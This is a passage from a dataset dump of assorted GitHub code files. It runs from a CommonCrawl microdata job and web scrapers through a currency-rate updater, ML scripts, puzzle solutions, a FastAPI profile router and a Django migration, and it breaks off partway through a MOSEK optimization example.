'(?:goo\\.gl)/maps',\n 'address',\n 'og:latitude',\n 'og:postal_code',\n 'og:street_address',\n 'business:contact_data:street_address',\n 'business:contact_data:postal_code',\n 'place:location:latitude',\n 'geo\\.position',\n 'icbm',\n 'data-lat',\n 'data-lon',\n 'data-lng',\n 'data-long',\n]\n\ncontains_microdata_regex = re.compile('|'.join(patterns), re.I | re.UNICODE)\n\n\nclass MicrodataJob(CommonCrawlJob):\n valid_charsets = set(['utf-8', 'iso-8859-1', 'latin-1', 'ascii'])\n\n def report_vcard_item(self, item):\n have_latlon = False\n for prop in item.get('properties'):\n propname = prop.get('name')\n if propname == 'street_address':\n self.increment_counter('commoncrawl', 'vcard:street_address')\n elif propname == 'postal_code':\n self.increment_counter('commoncrawl', 'vcard:postal_code')\n elif propname == 'org_name':\n 
self.increment_counter('commoncrawl', 'vcard:org_name')\n elif propname in ('latitude', 'longitude') and not have_latlon:\n self.increment_counter('commoncrawl', 'vcard:geo')\n have_latlon = True\n\n def report_schema_dot_org_item(self, item):\n have_address = False\n have_latlon = False\n for prop in item.get('properties'):\n if prop.get('name') == 'address' or prop.get('type', '').lower() == 'postaladdress':\n address_props = prop.get('properties', [])\n for aprop in address_props:\n if aprop.get('name', '').lower() == 'streetaddress':\n have_address = True\n elif prop.get('name', '').lower() == 'geo':\n geo_props = prop.get('properties', [])\n for gprop in geo_props:\n if gprop.get('name', '').lower() == 'latitude':\n have_latlon = True\n elif prop.get('name', '').lower() == 'latitude':\n have_latlon = True\n if have_address and have_latlon:\n break\n if have_address:\n self.increment_counter('commoncrawl', 'schema.org:address', 1)\n if have_latlon:\n self.increment_counter('commoncrawl', 'schema.org:geo', 1)\n\n def report_items(self, items):\n self.increment_counter('commoncrawl', 'sites with places', 1)\n for item in items:\n item_type = item.get('item_type')\n if not item_type:\n continue\n elif item_type == VCARD_TYPE:\n self.report_vcard_item(item)\n elif item_type == SCHEMA_DOT_ORG_TYPE:\n self.report_schema_dot_org_item(item)\n else:\n self.increment_counter('commoncrawl', item_type, 1)\n\n def report_social(self, social):\n for k, vals in social.iteritems():\n self.increment_counter('commoncrawl', 'url type {}'.format(k),\n len(vals))\n\n def parse_content(self, content):\n content = br2nl(content)\n return BeautifulSoup(content, 'html.parser')\n\n def filter(self, url, headers, content):\n return contains_microdata_regex.search(content)\n\n def process_html(self, url, headers, content, soup):\n ret = extract_items(soup)\n if not ret:\n return\n items = ret.get('items')\n if items:\n self.report_items(items)\n\n social_handles = ret.get('social')\n if social_handles:\n self.report_social(social_handles)\n\n yield url, ret\n self.increment_counter('commoncrawl', 'filtered records', 1)\n\n\nif __name__ == '__main__':\n MicrodataJob.run()\n","repo_name":"openvenues/openvenues","sub_path":"openvenues/jobs/microdata.py","file_name":"microdata.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"17845973007","text":"from ctypes import ArgumentError\nfrom typing import List, Dict\n\nimport re\nfrom cloudscraper import create_scraper\nfrom bs4 import BeautifulSoup\n\nfrom ArticleParser import ArticleParser\nfrom OpinionsParser import OpinionsParser\n\n\nclass InvestingOpinionsParser(OpinionsParser):\n def __init__(self, articleParser: ArticleParser):\n self.__articleParser = articleParser\n self.__INVESTING_URL = \"https://ru.investing.com\"\n\n def parsePage(self, link: str) -> List[Dict[str, str]]:\n if not link.startswith(\"https://ru.investing.com/currencies/\"):\n raise ArgumentError(\n \"Link parameter should be a link to investing.com website\")\n\n result = list(list())\n\n scraper = create_scraper()\n\n parsedHtml = BeautifulSoup(scraper.get(\n link).text, features=\"html.parser\")\n for articleLink in self.__getArticlesFromPage(parsedHtml):\n try:\n articleHtml = scraper.get(\n self.__INVESTING_URL + articleLink).text\n parsedArticle = self.__articleParser.parseArticle(\n BeautifulSoup(articleHtml, features=\"html.parser\"))\n\n parsedArticle['link'] = self.__INVESTING_URL 
+ articleLink\n result.append(parsedArticle)\n except:\n pass\n\n return result\n\n def __getArticlesFromPage(self, parsedHtml: BeautifulSoup) -> List[str]:\n links = set()\n\n for link in parsedHtml.findAll(\"a\", attrs={'href': re.compile(r'/analysis/article-[0-9]+$')}):\n links.add(link.get('href'))\n\n return list(links)\n","repo_name":"airh4ck/Financial-News-Analytics-System","sub_path":"investing_grabber/src/InvestingOpinionsParser.py","file_name":"InvestingOpinionsParser.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36479465726","text":"#!/usr/bin/env python\n\"\"\"A script to update the exchange rates for 1 EUR in SEK and 1 USD in SEK.\n\n\"\"\"\n\nimport argparse\nfrom couchdb import Server\nimport datetime\nimport json\nimport requests\nimport yaml\n\n\nclass CurrencyRates(object):\n \"\"\"A class to fetch currency rates from fixer.io.\"\"\"\n def __init__(self, config_file):\n\n self.rates_fetched = False\n self._source_url = \"https://api.apilayer.com/fixer/latest\"\n\n with open(config_file, 'r') as fh:\n config = yaml.load(fh, Loader=yaml.SafeLoader)\n self._apikey = config.get('apikey')\n\n def fetch_rates(self):\n response = requests.get(self._source_url, params={'base': 'SEK', 'symbols': 'USD, EUR'}, headers={'apikey': self._apikey})\n assert response.status_code == 200\n self.data = json.loads(response.text)\n self.rates = self.data['rates']\n self.rates_fetched = True\n\n def get_rate(self, currency):\n \"\"\"Get the exchange rate for SEK to the given currency.\"\"\"\n if not self.rates_fetched:\n self.fetch_rates()\n\n return 1/self.rates[currency]\n\n\ndef get_current(db, item):\n rows = db.view(\"entire_document/by_date\", descending=True, limit=1).rows\n if len(rows) != 0:\n value = rows[0].value\n return value[item]\n return None\n\ndef check_financial_crisis(current_val, new_val, currency):\n if current_val is not None:\n rel_change = (new_val-current_val)/current_val\n print(\"INFO: Change in {} \"\n \"exchange rate: {:.3f}%\".format(currency, 100*(rel_change)))\n\n if abs(rel_change) > 0.20:\n raise Exception(\"Financial crisis or rather; something is likely wrong!\")\n\ndef main(config, fixer_io_config, push_to_server=False):\n\n c = CurrencyRates(fixer_io_config)\n # Will raise RatesNotAvailableError if not able to fetch from the api\n usd_to_sek = c.get_rate('USD')\n eur_to_sek = c.get_rate('EUR')\n\n # Inconsistent results for Euro after broken API was updated\n if isinstance(eur_to_sek, str):\n eur_to_sek = float(eur_to_sek)\n\n # Create the doc that will be uploaded\n doc = {}\n doc['Issued at'] = datetime.datetime.now().isoformat()\n # I know it's bad practice to call the _source_url method,\n # but if it breaks it breaks.\n doc['Data source'] = \"Fixer.io via ({})\".format(c._source_url)\n doc['USD_in_SEK'] = usd_to_sek\n doc['EUR_in_SEK'] = eur_to_sek\n\n # Load the statusdb database\n with open(config) as settings_file:\n server_settings = yaml.load(settings_file, Loader=yaml.SafeLoader)\n\n url_string = 'https://{}:{}@{}'.format(\n server_settings['statusdb'].get('username'),\n server_settings['statusdb'].get('password'),\n server_settings['statusdb'].get('url')\n )\n couch = Server(url_string)\n\n db = couch['pricing_exchange_rates']\n\n # Check that new is not too strange compared to current.\n # This is a safety measure so that we have lower risk of having erroneus\n # exchange rates in the db.\n current_usd = get_current(db, 'USD_in_SEK')\n 
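# Worked example with made-up numbers: if current_usd is 10.0 and the fresh\n    # usd_to_sek is 12.5, the relative change is +25%, which exceeds the 20%\n    # threshold and makes check_financial_crisis raise.\n    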
current_eur = get_current(db, 'EUR_in_SEK')\n\n check_financial_crisis(current_usd, usd_to_sek, 'USD')\n check_financial_crisis(current_eur, eur_to_sek, 'EUR')\n\n # Completely conserved currencies are also strange.\n if (current_eur is not None) and (current_usd is not None):\n # This assumes the script is not ran too often\n # (api udpates once per day)\n small_number = 0.0000000001\n if (abs(current_usd - usd_to_sek) < small_number) and \\\n (abs(current_eur - eur_to_sek) < small_number):\n raise Exception(\"Super stable currencies? Stale api would be my guess.\")\n\n if push_to_server:\n db.save(doc)\n else:\n print(doc)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--statusdb_config', required=True,\n help='The statusdb_cred.yaml file.')\n parser.add_argument('--fixer_io_config', required=True,\n help='The fixer_io.yaml file.')\n parser.add_argument('--push', action='store_true', help='Use this tag to '\n \"make the script push the changes to statusdb\")\n\n args = parser.parse_args()\n main(args.statusdb_config, args.fixer_io_config, push_to_server=args.push)\n","repo_name":"SciLifeLab/standalone_scripts","sub_path":"update_exchange_rates.py","file_name":"update_exchange_rates.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32353533054","text":"import logging\n\nimport numpy as np\n\nfrom beo import bo\nfrom beo.util import trace\nfrom beo import ensemble\n\n\ndef get_valid_jobs(expt, expt_trace):\n # Locate valid jobs (with completed predictions) from the expt trace\n # TODO: maybe do it directly from the prediction cache?\n if len(expt_trace) > 0:\n T = trace.inside_out(expt_trace, filter_keys=['choices'], \n verbose=False)\n valid_jobs = (~T['raised_exception']) & (~T['timeout'])\n valid_job_ids = T['job_id'][valid_jobs]\n\n invalid_jobs = T['raised_exception'] | T['timeout']\n invalid_job_ids = T['job_id'][invalid_jobs]\n else:\n valid_jobs = []\n valid_job_ids = []\n\n invalid_jobs = []\n invalid_job_ids = []\n return valid_jobs, valid_job_ids, invalid_jobs, invalid_job_ids\n\n\nclass BeoFwg(bo.BayesianOptimizer):\n '''\n Utility object to perform a hyper-parameter optimization. 
Provides\n fitness values for a forward greedy ensemble construction procedure.\n '''\n def __init__(self, ensemble_loss_func,\n replace_members, n_classifiers, \n **kwargs):\n '''\n Parameters:\n -----------\n\n ensemble_loss_func: function determining the `loss` of an ensemble given\n its predictions\n\n replace_members: will leave classifiers in the pool instead of removing\n them, effectively allowing the same classifier to be present \n multiple times in the ensemble\n\n n_classifiers: number of classifiers in the ensemble\n '''\n\n # Force the base class to store predictions on validation split(s)\n kwargs['store_pred_cache'] = True\n super().__init__(**kwargs)\n\n self.num_classifiers = n_classifiers\n self.ensemble_loss_func = ensemble_loss_func\n self.replace_members = replace_members\n\n # assume all labels are present in the test set\n self.u_labels = np.unique(self.test_pred_cache['labels'][0])\n\n # Evaluate the performance of a potential ensemble at given points\n def eval(self, expt, expt_trace, complete, values):\n return_info = {}\n\n bo.sync_hdf5_pred_cache(self.pred_cache_file, self.val_pred_cache)\n\n #Whose turn is it in the 'round-robin'?\n self.i = expt.get('i', 0) % self.num_classifiers\n logging.info(\"Optimizing classifier %i\" % self.i)\n\n #If the last iteration wasn't on the same classifier,\n #reset the chooser module to force a restart and burn-in\n if len(expt_trace) > 0 and expt_trace[-1]['i'] != self.i:\n return_info['clear_chooser_pkl'] = True\n\n losses_with_failed, ens_losses, ids, cur_ensemble = \\\n self.compute_loss_refresh_member_i(self.i,\n expt, expt_trace, values)\n\n # increment for next iteration, expt is saved on file system and\n # distributed to other nodes\n expt.i = self.i + 1\n\n return losses_with_failed, ids, return_info\n\n def update(self, job_id, job_results, expt, expt_trace,\n complete, values):\n # Set during first call to eval, the index of the classifier\n # targeted by this iteration. since expt.i can be affected by other\n # processes running fwgo, we need to store it explicitly\n i = self.i\n losses_with_failed, ens_losses, ids, cur_ensemble = \\\n self.compute_loss_refresh_member_i(i, expt,\n expt_trace, values, update_ensemble=True)\n\n if len(ens_losses) > 0:\n #compute test predictions for given ensemble --\n cur_ensemble_ids = list(cur_ensemble['choices'].values())\n\n # Test predictions are always evaluated the same, they're just\n # not exactly computed on the same data.\n ens_test_error, ens_test_loss = ensemble.eval_ensemble(\n cur_ensemble_ids, self.test_pred_cache, \n self.ensemble_loss_func, regression=False, \n u_labels=self.u_labels)\n\n # Give the proper label to testing error, as they are not the same\n if self.eval_params.get('retrain', True):\n cur_ensemble['test_TV_err'] = ens_test_error\n else:\n cur_ensemble['test_T_err'] = ens_test_error\n\n #losses = np.average(ensemble_loss_func(val_labels, predictions))\n\n # return dict that will be stored in the trace\n return {'ensemble': cur_ensemble, 'i': i}\n\n def compute_loss_refresh_member_i(self, i, expt, expt_trace, values,\n update_ensemble=True, bag_classifiers=False):\n '''\n Updates member `i` in the ensemble, i.e. remove it and compute losses\n for putting back any other classifier in the pool\n '''\n #current ensemble, stored in the resilient expt structure\n cur_ensemble = expt.get('cur_ensemble', {'choices': {}})\n\n choices = cur_ensemble['choices'].copy()\n #remove classifier for current iteration (i.e. 
make a choice again)\n if i in choices:\n choices.pop(i)\n\n valid_jobs, valid_job_ids, invalid_jobs, invalid_job_ids =\\\n get_valid_jobs(expt, expt_trace)\n\n if self.replace_members:\n # leave chosen classifiers in the pool\n remaining_complete = valid_job_ids\n else:\n remaining_complete = np.array([idx for idx in valid_job_ids if\n idx not in choices.values()], dtype=int)\n\n if bag_classifiers and len(remaining_complete) > 0:\n remaining_complete = np.random.choice(remaining_complete, \n int(0.66*len(remaining_complete)), replace=False)\n\n #measure fitnesses \n logging.info(\"Choices before eval: %s\" % choices)\n ens_errors, ens_losses = ensemble.eval_combinations(\n list(choices.values()), remaining_complete, self.val_pred_cache, \n self.ensemble_loss_func, False, self.u_labels)\n\n #Make a new choice given the pool of classifiers available\n if len(ens_errors) > 0:\n # Sorts by last key first, ens_losses, then individual validation\n # errors, with a last randomly sampled tiebreaking entry\n min_i = np.lexsort((\n np.random.sample(len(ens_losses)), \n values[remaining_complete], \n ens_losses))[0]\n my_choice = remaining_complete[min_i]\n\n if update_ensemble:\n cur_ensemble['choices'][i] = my_choice\n cur_ensemble['val_T_err'] = ens_errors[min_i]\n expt.cur_ensemble = cur_ensemble \n logging.info(\"Choices: %s\" % cur_ensemble['choices'])\n logging.info(\"Single best validation error: %f\" % \n np.min(values))\n logging.info(\"Ensemble validation error : %f\" % \n ens_errors[min_i])\n\n logging.debug(\"Ensemble losses (%s): %s\" % (self.ensemble_loss_func,\n ens_losses))\n \n invalid_jobs_losses = values[invalid_job_ids]\n\n # Put back losses of incomplete jobs\n losses_with_failed = np.hstack((ens_losses, invalid_jobs_losses))\n ids = np.hstack((remaining_complete, invalid_job_ids)).astype(int)\n\n return losses_with_failed, ens_losses, ids, cur_ensemble\n","repo_name":"jclevesque/bayes_ens_opt","sub_path":"beo/beo_fwg.py","file_name":"beo_fwg.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70009467114","text":"# # My Solution\n# class Solution:\n# def longestCommonPrefix(self, strs):\n# small = strs[0]\n# for i in range(len(strs)):\n# if len(strs[i]) < len(small) :\n# small = strs[i]\n# # small = flow\n# for ele in strs:\n# for j in range(len(small)):\n# if small not in ele[:len(small)] :\n# small = small[:-1]\n# if small == '' :\n# return ''\n# else:\n# break\n# return small\n \n# sol = Solution()\n# strs = [\"flower\",\"flow\",\"flight\"]\n# result = sol.longestCommonPrefix(strs)\n# print(result)\n\n\nclass Solution:\n def longestCommonPrefix(self, v):\n ans=\"\"\n v=sorted(v)\n print(v)\n first=v[0]\n last=v[-1]\n for i in range(min(len(first),len(last))):\n if(first[i]!=last[i]):\n return ans\n ans+=first[i]\n return ans \nsol = Solution()\nstrs = [\"flower\",\"flow\",\"flight\"]\nresult = sol.longestCommonPrefix(strs)\nprint(result)","repo_name":"hiaman80/Python","sub_path":"LeetCode_String.py","file_name":"LeetCode_String.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4678301954","text":"import flask\n\nimport app.models\n\n\ndef render_template( source, **context):\n \"\"\"\n Making a specialized render_template function that defaults some context in.\n This should be used any time we're rendering a template, so that defaults\n are always used.\n\n 
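A usage sketch (the template name and context are hypothetical)::\n\n        return render_template('index.html', posts=posts)\n\n    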
*Arguments:*\n\n    :``source``: `str` the name of the template to render\n\n    """\n\n    post_types = [ ]\n\n    for post_type in app.models.Post_Type.get_ordered():\n        if post_type.posts:\n            post_types.append((post_type.type_url_name, post_type.type_name))\n\n    return flask.render_template(source, post_types=post_types, **context)\n","repo_name":"hunnybear/website","sub_path":"src/hunb_site/app/views/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12860665946","text":"# boj 16918 Bomberman s1\n# noj.am.16918\nimport sys\nfrom collections import deque\n\ninp = sys.stdin.readline\nR, C, N = map(int, inp().split())\ngrid = [list(inp().rstrip()) for _ in range(R)]\nbombLoc = deque()\ndx, dy = [1, -1, 0, 0], [0, 0, 1, -1]\n\n\ndef whichBomb():\n    for i in range(R):\n        for j in range(C):\n            if grid[i][j] == "O": # find the positions that contain a bomb\n                bombLoc.append((i, j))\n\n\ndef setupBomb():\n    global grid\n    grid = [["O"] * C for _ in range(R)]\n\n\ndef bomb():\n    while bombLoc:\n        x, y = bombLoc.popleft()\n        grid[x][y] = "."\n        for i in range(4):\n            X, Y = x + dx[i], y + dy[i]\n            if 0 <= X < R and 0 <= Y < C:\n                grid[X][Y] = "."\n\n\nN -= 1 # nothing changes after the first second\nwhile N > 0:\n    whichBomb()\n    setupBomb()\n    N -= 1 # after the second wave of bombs is planted, one more second must pass before they explode\n    if N == 0:\n        break\n    bomb()\n    N -= 1 # time passes\n\nfor arr in grid: # print the result\n    print("".join(arr))\n","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/BOJ/16918_봄버맨_s1/16918.py","file_name":"16918.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"5718597494","text":"import argparse\nimport PIL.Image\nimport geojson\nimport rasterio.features\nimport numpy as np\nimport shapely\nimport openslide\nimport json\n\nfrom util import group_by_class, scale_shapes, get_code_to_color_from_profile\n\n\ndef main(args):\n    with open(args.profile_path, 'r') as file:\n        json_data = json.loads(file.read())\n    code_to_color = get_code_to_color_from_profile(json_data)\n\n    # Load Slide\n    slide = openslide.open_slide(args.svs_path)\n    slide_img = slide.read_region((0,0), len(slide.level_dimensions)-1, slide.level_dimensions[-1]).convert('RGB')\n\n    # Get target resolution\n    mpp = float(slide.properties['openslide.mpp-x'])\n    full_res = slide.level_dimensions[0]\n    downsample_rate = args.output_resolution / mpp\n    target_res = np.round(np.array(full_res) / downsample_rate).astype(int)\n\n    # Load Annotations\n    geoj = geojson.load(open(args.annotation_path, 'rb'))\n    shapes_by_class = group_by_class(geoj)\n    shapes_by_class = scale_shapes(shapes_by_class, downsample_rate)\n\n    # Rasterize Annotations\n    annotation_img, _ = visualize_annotations(code_to_color, shapes_by_class, [target_res[0], target_res[1]])\n\n    # Blend Annotations and Slide\n    PIL.Image.blend(slide_img.resize(target_res), annotation_img, alpha=args.alpha).save(args.output_path)\n\n\ndef visualize_annotations(class_to_color, shapes_by_class, resolution):\n    annotation_img = np.zeros(np.array((resolution[1], resolution[0], 3)), dtype=np.uint8)\n    area_per_class = {}\n    for class_name in shapes_by_class.keys():\n        img = rasterio.features.rasterize([shapes_by_class[class_name]], out_shape=np.array((resolution[1], resolution[0])))\n        annotation_img[img != 0] = np.array(class_to_color[class_name])\n\n        area_per_class[class_name] = shapely.area(shapes_by_class[class_name])\n    annotation_img = PIL.Image.fromarray(annotation_img)\n\n    return annotation_img, area_per_class  # returns: 
annotation_img, area_per_class\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Visualisation of Whole Slide Image (WSI) and annotations.')\n\n parser.add_argument('--svs_path', type=str, required=True, help='Path to Whole Slide Image (WSI) as .svs')\n parser.add_argument('--annotation_path', type=str, required=True,\n help='Annotations as .geojson exported from QuPath')\n parser.add_argument('--profile_path', type=str, required=True, help='Path to the Tissue Maps profile as .json')\n parser.add_argument('--output_path', type=str, required=True, help='Path where the output image is saved')\n parser.add_argument('--output_resolution', type=float, required=True,\n help='Resolution of the output in micro meters per pixel.')\n parser.add_argument('--alpha', type=float, default=0.5, help='Alpha value for overlay of annotations and WSI')\n\n args = parser.parse_args()\n\n print(f\"Processing WSI from: {args.svs_path}\")\n print(f\"\\tApplying annotations from: {args.annotation_path}\")\n print(f\"\\tUsing Tissue Types profile: {args.profile_path}\")\n print(f\"\\tOutput will be generated with a resolution of: {args.output_resolution} micrometer per pixel\")\n print(f\"\\tAlpha for overlay: {args.alpha}\")\n\n main(args)","repo_name":"human-centered-ai-lab/WSIDOM","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18194637262","text":"from azureml.pipeline.core import Pipeline, PipelineData, StepSequence\nfrom azureml.pipeline.steps import PythonScriptStep\nfrom azureml.pipeline.steps import DataTransferStep\nfrom azureml.pipeline.core import PublishedPipeline\nfrom azureml.pipeline.core.graph import PipelineParameter\nfrom azureml.core import ScriptRunConfig\nfrom azureml.core import Workspace, Run, Experiment, Datastore\nfrom azureml.core.compute import AmlCompute\nfrom azureml.core.compute import ComputeTarget, DataFactoryCompute\nfrom azureml.data.data_reference import DataReference\n\naml_compute_target = \"cpu\"\nproject_folder = '.'\n\nws = Workspace.from_config()\n\n\n# Runconfig\nfrom azureml.core.runconfig import CondaDependencies, RunConfiguration\ncd = CondaDependencies.create(pip_packages=[\"sklearn\", \"azureml-defaults\"])\namlcompute_run_config = RunConfiguration(conda_dependencies=cd)\n\n# Make sure the compute target exists\ntry:\n aml_compute = AmlCompute(ws, aml_compute_target)\n print(\"found existing compute target.\")\nexcept:\n print(\"compute target not found. 
exiting\")\n\n#Data transfer example\n\ndata_factory_name = \"adf\"\ndata_factory_compute = DataFactoryCompute(ws, data_factory_name)\n\n# For model reproducibility, we want to ensure that we preserve the images we're actually using to train from the larger data lake\n\nsource_ds = Datastore.get(ws, 'amlvdaik14969151586')\ndest_ds = ws.get_default_datastore()\n\norig_images = DataReference(\n datastore=source_ds,\n data_reference_name=\"origin_images\",\n path_on_datastore= '')\n\ndest_images = DataReference(\n datastore=dest_ds,\n data_reference_name=\"destination_images\",\n path_on_datastore= 'my_training_data')\n\ntransfer_images = DataTransferStep(\n name=\"transfer_images\",\n source_data_reference=orig_images,\n destination_data_reference=dest_images,\n compute_target=data_factory_compute)\n\nsteps = [transfer_images]\n\nprint(\"Step lists created\")\n\npipeline1 = Pipeline(workspace=ws, steps=steps)\nprint (\"Pipeline is built\")\n\npipeline1.validate()\nprint(\"Pipeline validation complete\")\n\npipeline_run1 = Experiment(ws, 'justdatatransfer').submit(pipeline1)\nprint(\"Pipeline is submitted for execution\")","repo_name":"sumanmsft/https-github.com-sumigator-DemoDevOpsML","sub_path":"reference/datatransferpipeline.py","file_name":"datatransferpipeline.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3985132001","text":"import os\n\nfrom fastapi import APIRouter, Depends, UploadFile\nfrom sqlalchemy.orm import Session\n\nfrom database.config import get_db\nfrom database.models import Users\nfrom database.schemas import ProfileResponse, UserBaseUpdate\nfrom utils.auth import get_current_user\n\n\nrouter = APIRouter(prefix=\"/profile\", tags=[\"Profile - Information\"])\n\n\n@router.post(\"/picture\")\nasync def set_profile_picture(\n file: UploadFile,\n user=Depends(get_current_user),\n database: Session = Depends(get_db),\n):\n \"\"\"Function to set user profile picture\"\"\"\n\n content = await file.read()\n\n if file.filename:\n with open(os.path.join(\"pictures\", file.filename), \"wb\") as pictures_folder:\n pictures_folder.write(content)\n\n database.query(Users).filter(Users.id == user.id).update(\n {\"picture\": file.filename}\n )\n database.commit()\n database.flush()\n\n return {\"filename\": file.filename}\n\n\n@router.get(\"/{username}\", response_model=ProfileResponse)\ndef get_profile(username: str, database: Session = Depends(get_db)):\n \"\"\"Function to get user profile\"\"\"\n\n user_profile = database.query(Users).filter(Users.username == username).first()\n\n return user_profile\n\n\n@router.get(\"/\", response_model=ProfileResponse)\ndef get_current_profile(\n user=Depends(get_current_user), database: Session = Depends(get_db)\n):\n \"\"\"Function to get user profile logged in by JWT token\"\"\"\n # test\n\n user_profile = database.query(Users).filter(Users.id == user.id).first()\n\n return user_profile\n\n\n#\n# @router.get('/')\n# async def test_profile():\n# return \"hello world\"\n#\n@router.post(\"/\")\ndef update_profile(\n body: UserBaseUpdate,\n user=Depends(get_current_user),\n database: Session = Depends(get_db),\n):\n database.query(Users).filter(Users.id == user.id).update(\n {\n \"first_name\": body.first_name,\n \"last_name\": body.last_name,\n \"username\": body.username,\n \"about\": body.about,\n }\n )\n\n 
\n    database.commit()\n","repo_name":"tovarc/social-app-backend","sub_path":"routers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12427503410","text":"# -*- coding: utf-8 -*-\r\n"""\r\nCreated on Tue Apr 24 11:10:27 2018\r\n\r\n@author: prita\r\n"""\r\n\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom time import time\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, MinMaxScaler, StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.naive_bayes import BernoulliNB\r\n\r\n## Step 1 - Data collection : Download the data\r\nHouseVotes = pd.read_csv(\"C:\PritamData\Stats_With_R\Homework\HouseVotes84.csv\")\r\n\r\n## Step 2: Data exploration and preparation : Exploring and preparing the data ---- \r\nprint(\"\\nNo of rows and columns\\n\", HouseVotes.shape) ## No of rows and columns\r\nprint(\"\\nDatatypes \\n\", HouseVotes.dtypes) ## Structure\r\nprint(\"\\nCount per Class\\n\",HouseVotes.groupby('Class').size()) ## count\r\nprint(\"\\nLength \", len(HouseVotes.Class))\r\n\r\nX = HouseVotes.iloc[:,2:]\r\ny = HouseVotes.iloc[:,1]\r\n\r\n## Step 2: Data exploration and preparation : Encode the 'y'/'n' votes as 1/0 \r\n\r\nfor col in X.columns.values:\r\n    X = X.replace({col: {'y': 1, 'n': 0}})\r\n\r\n##Fill every column with its own most frequent value\r\nX = X.apply(lambda x:x.fillna(x.value_counts().index[0]))\r\n\r\n#Splitting the dataset into the Training set and Test set\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.23, random_state = 0)\r\n\r\nprint(\"\\nSize of Training Dataset\\n\",y_train.count()) ## count for y_train\r\nprint(\"\\nSize of Testing Dataset\\n\",y_test.count()) ## count for y_test\r\nprint(\"\\nClass proportions - Train\\n\",y_train.value_counts() / len(y_train) * 100) ## percentages\r\nprint(\"\\nClass proportions - Test \\n\",y_test.value_counts() / len(y_test) * 100) ## percentages\r\n\r\n## Step 3: Model Training: Training a model on the data ----\r\n# Fitting Naive Bayes to the Training set\r\nclassifier = BernoulliNB()\r\nclassifier.fit(X_train, y_train)\r\n\r\n## Step 4: Model Evaluation : Evaluating model performance ----\r\nt0=time()\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\nprint(\"\\nPredictions time:\", round(time()-t0, 3), \"s\")\r\nprint(\"Confusion matrix after prediction\\n\", confusion_matrix(y_test, y_pred))\r\nprint(\"Accuracy: \", accuracy_score(y_test, y_pred)*100, \"%\")\r\nprint(\"Classification Report: \", classification_report(y_test, y_pred))\r\n\r\n## Step 5: Model Improvement : Improving model performance 
----\r\n","repo_name":"pritambarlota/Academic-Projects","sub_path":"NaiveBayes_HouseVotes84.py","file_name":"NaiveBayes_HouseVotes84.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25933369150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('master', '0028_localesnulos'),\n ('temp', '0003_baseaccpreciototal'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TablaFinalAccPrecioTotal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigoMaterial', models.IntegerField()),\n ('material', models.CharField(max_length=100)),\n ('con', models.FloatField(default=0)),\n ('sin', models.FloatField(default=0)),\n ('sobre', models.FloatField(default=0)),\n ('oficina', models.ForeignKey(to='master.OficinaVentas')),\n ('periodo', models.ForeignKey(to='master.Periodo')),\n ('sector', models.ForeignKey(to='master.Sector')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"Teino1978-Corp/Teino1978-Corp-light_.gitignore","sub_path":"light_temp_migrations_0004_tablafinalaccpreciototal.py","file_name":"light_temp_migrations_0004_tablafinalaccpreciototal.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19834595947","text":"import sys\nimport mosek\nimport mosek.fusion\nfrom mosek.fusion import *\nfrom mosek import LinAlg\n\n\"\"\"\n Assuming that e is an NxN expression, return the lower triangular part as a vector.\n\"\"\"\ndef vec(e):\n N = e.getShape()[0]\n\n msubi = range(N * (N + 1) // 2)\n msubj = [i * N + j for i in range(N) for j in range(i + 1)]\n mcof = [2.0**0.5 if i !=\n j else 1.0 for i in range(N) for j in range(i + 1)]\n\n S = Matrix.sparse(N * (N + 1) // 2, N * N, msubi, msubj, mcof)\n return Expr.mul(S, Expr.flatten(e))\n\ndef nearestcorr(A):\n N = A.numRows()\n\n # Create a model\n with Model(\"NearestCorrelation\") as M:\n # Setting up the variables\n X = M.variable(\"X\", Domain.inPSDCone(N))\n t = 